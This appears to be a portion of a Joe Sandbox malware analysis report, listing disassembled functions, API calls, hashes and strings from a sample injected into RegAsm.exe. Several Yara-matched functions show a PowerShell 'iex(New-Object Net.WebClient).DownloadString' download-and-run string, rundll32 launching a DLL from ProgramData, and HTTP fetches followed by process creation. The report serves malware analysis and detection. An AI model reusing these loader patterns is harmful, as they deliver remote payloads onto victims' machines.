                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
                                                    • API String ID: 0-3324442540
                                                    • Opcode ID: 09de832e4ad3264db7ecacc77674da99257faa97280f4249f7faeaafccd0d18b
                                                    • Instruction ID: a6446b1dc1017cc5af3c829eb8487e63606ce4812cd0c49700ce500b87c0d047
                                                    • Opcode Fuzzy Hash: 09de832e4ad3264db7ecacc77674da99257faa97280f4249f7faeaafccd0d18b
                                                    • Instruction Fuzzy Hash: 0B81F175A043529BDB008F64DC84A8BB7E8FF44769F040269FD45AB210E73EF920DB92
                                                    Function 1FB274A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • invalid, xrefs: 1FB274BC
                                                    • %s at line %d of [%.10s], xrefs: 1FB274DC
                                                    • misuse, xrefs: 1FB274D7
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FB274CD
                                                    • unable to close due to unfinalized statements or unfinished backups, xrefs: 1FB275D1
                                                    • API call with %s database connection pointer, xrefs: 1FB274C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                    • API String ID: 0-3800776574
                                                    • Opcode ID: 48c20d8a21d39d47d75bb685fa712da0baadd1a25c340231fc8fd8df89508f90
                                                    • Instruction ID: 721e38393f0cb4dbfabefac9452f9ab09f4268f2f6852cb42491f672be326c33
                                                    • Opcode Fuzzy Hash: 48c20d8a21d39d47d75bb685fa712da0baadd1a25c340231fc8fd8df89508f90
                                                    • Instruction Fuzzy Hash: C4516474A00B12ABD7118B38BC84B9BB7E5EF40724F640018E99E96341F739F551C3AA
                                                    Function 00413F5A Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004140E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                    • String ID: CA$')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    • API String ID: 2215929589-1568210641
                                                    • Opcode ID: 8e91d5c534343fc3e33cabc981ee1271554e1bdb2bac536b6b3cf1ed09433482
                                                    • Instruction ID: 2e843fc000d8416bd3dbc05d1e9ae495b45b34b851b8c2d099c776955265e93a
                                                    • Opcode Fuzzy Hash: 8e91d5c534343fc3e33cabc981ee1271554e1bdb2bac536b6b3cf1ed09433482
                                                    • Instruction Fuzzy Hash: 6751EE719102089ADB14FBE1DCA2FDDB778AF10305F50406EE216A61E1DF785AC9CF58
                                                    Function 0040E638 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strchr$lstrlen
                                                    • String ID: 0123456789ABCDEF
                                                    • API String ID: 2725200765-2554083253
                                                    • Opcode ID: 8b16c25132bc3e6aa80ea2e1fda564ee457b7c6459d3040e764f623306277993
                                                    • Instruction ID: 46cccf125fc31855eb9dff2261fe02118d1d410b234b58c33e9b0ac1b0e2b6e5
                                                    • Opcode Fuzzy Hash: 8b16c25132bc3e6aa80ea2e1fda564ee457b7c6459d3040e764f623306277993
                                                    • Instruction Fuzzy Hash: A1512470E00209EFDF10DFA9D841BEDBBB5EF09304F1084AAE419AB2A1D7759A85CF54
                                                    Function 1FACBCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • undersize RTree blobs in "%q_node", xrefs: 1FACBDA1
                                                    • PRAGMA %Q.page_size, xrefs: 1FACBD03
                                                    • SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1FACBD67
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
                                                    • API String ID: 0-3485589083
                                                    • Opcode ID: 769d319fccabb81f90f3cc6c3586ee0f45395d1499b9cac225b3998b6fab1038
                                                    • Instruction ID: 86cdf4539fd432e7edb682d463683f5846b92526e912d84a53f7459cfbe5ab04
                                                    • Opcode Fuzzy Hash: 769d319fccabb81f90f3cc6c3586ee0f45395d1499b9cac225b3998b6fab1038
                                                    • Instruction Fuzzy Hash: AA3122B1A04312ABD7048B25CD80A9773E8EF447A5F040265FE0596301E73FE964EBA1
                                                    Function 0041254A Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 38memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateDCA.GDI32(00000000,00000000,00000000,?), ref: 0041255C
                                                    • GetDeviceCaps.GDI32(?,00000008), ref: 0041256A
                                                    • GetDeviceCaps.GDI32(?,0000000A), ref: 00412578
                                                    • ReleaseDC.USER32(00000000,?), ref: 00412586
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00412593
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041259A
                                                    • wsprintfA.USER32 ref: 004125B1
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                    • String ID: %dx%d
                                                    • API String ID: 3940144428-2206825331
                                                    • Opcode ID: b22c5c38cc7cdad4ef6c166147913989f5cf1351a917ecd119eae9f0ff66eb37
                                                    • Instruction ID: 5ce7785616710ce4f89e5332b354fec486e5a05674633c85d06844614b7c2b8c
                                                    • Opcode Fuzzy Hash: b22c5c38cc7cdad4ef6c166147913989f5cf1351a917ecd119eae9f0ff66eb37
                                                    • Instruction Fuzzy Hash: F901E878A80209FFEB01AFA0DD0ABAD7FB2FB06705F105455FA12B91E0C7715A50DB55
                                                    Function 1FB232F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: 96829313a16be0ae2fbc90066ac3be56674192d708d5e683409de3119d1767a8
                                                    • Instruction ID: 23f22f8eacafaefdf5902547380795726215a6313aa774d5e9fc2a0543d8d04d
                                                    • Opcode Fuzzy Hash: 96829313a16be0ae2fbc90066ac3be56674192d708d5e683409de3119d1767a8
                                                    • Instruction Fuzzy Hash: 3FF14371A057529FD700CF29D880AA6BBE0FF44324F884599E95CCB352E33AF956C7A1
                                                    Function 1FA39700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (FK)
                                                    • API String ID: 0-1642768157
                                                    • Opcode ID: 717a637b7dedb7f0d4c246a724012f1256e5b4f6b8667b17f8aae830383468db
                                                    • Instruction ID: 37dc457855df589a9292b4dcb397e09cad94289308f01f3c4d504b06ad80ed15
                                                    • Opcode Fuzzy Hash: 717a637b7dedb7f0d4c246a724012f1256e5b4f6b8667b17f8aae830383468db
                                                    • Instruction Fuzzy Hash: 3581B477B053009FD7149F28EC40B56F3A2FB88236F2446AEE54A8B6A1E736F510DB51
                                                    Function 1FBB8D80 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 271COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s-shm$readonly_shm$winOpenShm
                                                    • API String ID: 0-2815843928
                                                    • Opcode ID: 745e5751d117f10abf35b1c5875ba8c1a2ec24d08b4df4816b94733bac02610b
                                                    • Instruction ID: 060876c3e11ef7bcf364033048c988a4065d8d5968fcd1b8e0b6029f7e55e046
                                                    • Opcode Fuzzy Hash: 745e5751d117f10abf35b1c5875ba8c1a2ec24d08b4df4816b94733bac02610b
                                                    • Instruction Fuzzy Hash: 6491BFB09083129FDB10DF25EC84BA777A9EF00B25F040569FE4696381E736F525DBA2
                                                    Function 0041396B Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 233COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00413C16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                    • String ID: "" $$BA$.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                    • API String ID: 2215929589-646926709
                                                    • Opcode ID: 45d5be44739e81b9edab66bad14ffca3f4e409a00a5552d9b1fa4abfd336d293
                                                    • Instruction ID: cfeabb11261229d7ed837fa1be0ad6a25a3c7238fc58edf77806757b94d1f4fc
                                                    • Opcode Fuzzy Hash: 45d5be44739e81b9edab66bad14ffca3f4e409a00a5552d9b1fa4abfd336d293
                                                    • Instruction Fuzzy Hash: CE91FD719002089ADB15FBA1DD92FEDB778AF10305F50406FE216A61E1EF386B89CF58
                                                    Function 00413D08 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00404AD5: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404B22
                                                      • Part of subcall function 00404AD5: RtlAllocateHeap.NTDLL(00000000), ref: 00404B29
                                                      • Part of subcall function 00404AD5: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404B54
                                                      • Part of subcall function 00404AD5: StrCmpCA.SHLWAPI(?), ref: 00404B6D
                                                      • Part of subcall function 00404AD5: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BA1
                                                      • Part of subcall function 00404AD5: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 00404C00
                                                      • Part of subcall function 00404AD5: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00404C38
                                                      • Part of subcall function 00404AD5: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C49
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00413738: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00413E1B,?,?,.exe,00425200), ref: 00413759
                                                    • memset.MSVCRT ref: 00413E26
                                                    • memset.MSVCRT ref: 00413E36
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00428E60,?,?), ref: 00413EA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
